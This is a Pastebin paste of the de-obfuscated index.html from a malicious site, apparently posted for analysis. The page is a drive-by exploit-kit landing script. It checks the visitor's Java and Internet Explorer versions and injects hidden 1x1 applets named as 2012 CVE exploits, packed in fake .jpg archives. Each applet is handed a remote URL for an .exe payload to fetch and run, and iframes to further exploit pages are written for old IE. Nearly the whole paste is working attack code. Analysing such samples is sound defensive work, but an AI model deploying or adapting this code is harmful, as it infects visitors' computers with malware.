eromang

qq.wangmazz.com de-obfuscated index.html

Oct 21st, 2012
278
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. xfxA2 = KfdhQD7;
  2.     fQFezgL3 = jROgpr3(20100418);
  3.     while (window.closed) {
  4.     }
  5.     document.write("<br>");
  6.     var gondady = document.createElement("body");
  7.     document.body.appendChild(gondady);
  8.     var gondadx = deployJava.getJREs() + "";
  9.     var arrx = gondadx.split(",");
  10.     gondadx = parseInt(arrx[0].replace(/\.|\_/g, ""));
  11.     for (i = 1; i < arrx.length; i++) {
  12.         tmp = parseInt(arrx[i].replace(/\.|\_/g, ""));
  13.         if (gondadx < tmp) {
  14.             gondadx = tmp;
  15.         }
  16.     }
  17.     if (gondadx <= 17006 && gondadx >= 17000 ||
  18.         gondadx <= 16032 && gondadx >= 16000 ||
  19.         gondadx <= 15033 && gondadx >= 15000) {
  20.         var gondad = document.createElement("applet");
  21.         gondad.width = "1";
  22.         gondad.height = "1";
  23.         if (gondadx <= 16027 && gondadx >= 16000 ||
  24.             gondadx >= 15000 && gondadx <= 15031) {
  25.             gondad.archive = "MpIDoGd6.jpg";
  26.             gondad.code = "GondadGondadExp.class";
  27.             gondad.setAttribute("dota", "http://xx.xiamaqq.com/010/qaz2.exe");
  28.             document.body.appendChild(gondad);
  29.         } else if (gondadx <= 17002 && gondadx >= 17000 ||
  30.             gondadx <= 16030 && gondadx >= 16000 ||
  31.             gondadx <= 15033 && gondadx >= 15000) {
  32.             gondad.archive = "IlKnJ2.jpg";
  33.             gondad.code = "GondadExx.Ohno.class";
  34.             gondad.setAttribute("xiaomaolv", "http://xx.xiamaqq.com/010/qaz2.exe");
  35.             gondad.setAttribute("bn", "woyouyizhixiaomaolv");
  36.             gondad.setAttribute("si", "conglaiyebuqi");
  37.             gondad.setAttribute("bs", "748");
  38.             document.body.appendChild(gondad);
  39.         } else if (gondadx <= 17003 && gondadx >= 17000 ||
  40.             gondadx <= 16032 && gondadx >= 16000 ||
  41.             gondadx <= 15032 && gondadx >= 15000) {
  42.             gondad.archive = "hRqMABC5.jpg";
  43.             gondad.code = "gond1723.Gondattack.class";
  44.             gondad.setAttribute("xiaomaolv", "http://xx.xiamaqq.com/010/qaz2.exe");
  45.             gondad.setAttribute("bn", "woyouyizhixiaomaolv");
  46.             gondad.setAttribute("si", "conglaiyebuqi");
  47.             gondad.setAttribute("bs", "748");
  48.             document.body.appendChild(gondad);
  49.         } else if (gondadx <= 17006 && gondadx >= 17000) {
  50.             var BiDBDJ0 = window.navigator.userAgent.toLowerCase();
  51.             if (BiDBDJ0.indexOf("msie 6") > -1) {
  52.                 document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://xx.xiamaqq.com/010/qaz2.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'AgaUpx0.jpg'></OBJECT>");
  53.             } else {
  54.                 gondad.archive = "AgaUpx0.jpg";
  55.                 gondad.code = "cve2012xxxx.Gondvv.class";
  56.                 gondad.setAttribute("xiaomaolv", "http://xx.xiamaqq.com/010/qaz2.exe");
  57.                 gondad.setAttribute("bn", "woyouyizhixiaomaolv");
  58.                 gondad.setAttribute("si", "conglaiyebuqi");
  59.                 gondad.setAttribute("bs", "748");
  60.                 document.body.appendChild(gondad);
  61.             }
  62.         }
  63.     } else {
  64.         var BiDBDJ0 = window.navigator.userAgent.toLowerCase();
  65.         if (BiDBDJ0.indexOf("msie 6") > -1 ||
  66.             BiDBDJ0.indexOf("msie 7") > -1) {
  67.             document.writeln("<iframe src=MzQVVCV1.html></iframe>");
  68.         } else if (BiDBDJ0.indexOf("msie 8") > -1 &&
  69.             navigator.userAgent.indexOf("Windows NT 5.1") > -1 &&
  70.             navigator.browserLanguage.indexOf("ko") > -1) {
  71.             document.writeln("<iframe src=MpIDoGd6.html></iframe>");
  72.         }
  73.     }
  74.     delete BKKHW5;
  75.     delete KAEbwEp4;
  76.     delete HfVsMGm0;
  77.     delete SwRe6;
  78.     delete wyCk4;
  79.     delete HtDetKQ0;
  80.     delete JLCYl0;
  81.     delete WopPt5;
  82.     delete VMNLuY0;
  83.     delete VBnGOD0;
  84.     delete viNrp4;
  85.     delete AepzuTM4;
  86.     delete sLnUUk0;
  87.     delete KfdhQD7;
  88.     delete jbGUjNU4;
  89.     delete VxoxVUT7;
  90.     delete igsv2;
  91.     delete cyKn6;
  92.     delete IaQcSuH2;
  93.     delete jROgpr3;
  94.     delete fQFezgL3;
  95.     delete HxfuSm4;
  96.     delete GHNuliA6;
  97.     delete xfxA2;
  98.     delete bqCJvaD4;
  99.     delete AvxE8;
  100.     delete SuGW4;
  101.     delete RESK5;
  102.     delete oNJDGT6;
  103.     delete UGTG1;
  104.     delete ncWwT6;
  105.     delete oXpBQk7;
  106.     delete KMkVqO1;
  107.     delete qKKvff6;
  108.     delete PyeEtie1;
  109.     delete YMBOqa2;
  110.     delete tKVHRrc1;
  111.     delete vGOGxC5;
  112.     delete kDJFn2;
  113.     delete tUtYfW1;
  114.     try {
  115.         CollectGarbage();
  116.     } catch (e) {
  117.     }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×